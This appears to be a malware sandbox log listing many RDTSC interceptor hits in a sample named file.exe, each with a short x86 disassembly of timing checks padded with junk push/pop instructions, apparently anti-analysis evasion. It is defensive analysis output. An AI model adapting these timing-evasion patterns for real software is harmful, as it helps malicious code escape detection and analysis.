Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B0C11 second address: 12B0C1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FECC5126356h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B0C1E second address: 12B0C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B75BC second address: 12B7601 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECC512635Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FECC5126368h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a jmp 00007FECC5126363h 0x0000001f push ecx 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B7601 second address: 12B760A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B774A second address: 12B774E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B774E second address: 12B7770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FECC5476B35h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B78B1 second address: 12B78C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FECC512635Bh 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B78C5 second address: 12B78DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FECC5476B33h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B78DD second address: 12B78E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B78E3 second address: 12B78F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FECC5476B26h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B78F2 second address: 12B78F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B78F6 second address: 12B78FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B7B8F second address: 12B7B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FECC5126356h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B7B9A second address: 12B7B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B7B9F second address: 12B7BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FECC5126356h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B7D22 second address: 12B7D5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FECC5476B26h 0x00000009 jmp 00007FECC5476B35h 0x0000000e jmp 00007FECC5476B2Bh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 jnp 00007FECC5476B2Ch 0x0000001d jc 00007FECC5476B26h 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1261A2B second address: 1261A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FECC5126358h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dx, di 0x0000002b mov edx, 5B58CBF1h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1261A77 second address: 1261A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF7E6 second address: 12BF7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF7EC second address: 12BF7F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BFAA9 second address: 12BFAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BFAAF second address: 12BFABC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BFABC second address: 12BFAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007FECC5126367h 0x0000000b pushad 0x0000000c jmp 00007FECC5126362h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BFAF6 second address: 12BFAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BFC79 second address: 12BFC83 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FECC5126362h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BFF4D second address: 12BFF53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BFF53 second address: 12BFF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C00FE second address: 12C0102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C66D1 second address: 12C66EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC512635Fh 0x00000009 popad 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C6833 second address: 12C6841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FECC5476B2Ah 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C6841 second address: 12C684F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC512635Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C684F second address: 12C686D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007FECC5476B26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C74BF second address: 12C74E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126368h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C74E0 second address: 12C74F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007FECC5476B26h 0x0000000e jc 00007FECC5476B26h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7A46 second address: 12C7A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FECC5126356h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7CE6 second address: 12C7CFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B35h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D0A34 second address: 12D0A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FECC5126361h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CFD5C second address: 12CFD87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FECC5476B39h 0x0000000d jmp 00007FECC5476B2Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CFD87 second address: 12CFD8D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CFD8D second address: 12CFDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FECC5476B34h 0x0000000d jmp 00007FECC5476B39h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CFEFC second address: 12CFF00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CFF00 second address: 12CFF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FECC5476B28h 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007FECC5476B2Fh 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 jmp 00007FECC5476B2Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D01C4 second address: 12D01CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D0327 second address: 12D032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D060E second address: 12D0627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FECC5126367h 0x0000000c jmp 00007FECC512635Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D72DA second address: 12D72F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FECC5476B2Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D7857 second address: 12D7865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FECC5126356h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D8021 second address: 12D8041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FECC5476B2Ch 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007FECC5476B26h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D8041 second address: 12D8054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FECC5126356h 0x0000000d jbe 00007FECC5126356h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D8054 second address: 12D807A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FECC5476B30h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D8214 second address: 12D8226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC512635Bh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D90E3 second address: 12D912A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5476B35h 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FECC5476B38h 0x00000013 jmp 00007FECC5476B2Ah 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D912A second address: 12D912E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFBDB second address: 12DFBF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B35h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFBF6 second address: 12DFC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FECC5126356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFC00 second address: 12DFC04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DF68C second address: 12DF6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007FECC512637Ah 0x0000000b jmp 00007FECC512635Ch 0x00000010 jmp 00007FECC5126368h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DF955 second address: 12DF961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ECA67 second address: 12ECA91 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FECC5126356h 0x00000008 jmp 00007FECC5126365h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jno 00007FECC5126356h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F197A second address: 12F198B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5476B2Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FDCD2 second address: 12FDCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5126363h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FDCE9 second address: 12FDCFB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECC5476B2Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FDCFB second address: 12FDCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1302FB4 second address: 1302FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1302FB8 second address: 1302FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FECC512636Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1302FDE second address: 1302FE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1302FE3 second address: 1302FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13095E1 second address: 13095E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13095E5 second address: 13095EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13095EB second address: 1309603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FECC5476B2Bh 0x00000008 ja 00007FECC5476B26h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13099EA second address: 13099FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5126360h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1309FF2 second address: 1309FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1309FF6 second address: 1309FFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130A9BF second address: 130A9C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130A9C3 second address: 130A9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FECC512635Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130FCBE second address: 130FCC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1312F94 second address: 1312F98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1312F98 second address: 1312FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FECC5476B26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1312FA8 second address: 1312FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1312FAC second address: 1312FB6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECC5476B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131DC4C second address: 131DC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FECC5126366h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 131DC6D second address: 131DC73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220572 second address: 1220579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220579 second address: 122057F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122057F second address: 1220585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330C00 second address: 1330C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FECC5476B26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330C12 second address: 1330C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330C16 second address: 1330C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1330C1F second address: 1330C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FECC5126356h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13307BD second address: 13307C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13307C4 second address: 13307C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1345FF8 second address: 1346015 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007FECC5476B26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FECC5476B26h 0x00000017 jno 00007FECC5476B26h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13461AD second address: 13461C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5126366h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13461C7 second address: 13461CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1346BF3 second address: 1346BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1349D35 second address: 1349D65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d js 00007FECC5476B43h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FECC5476B31h 0x0000001a rdtsc
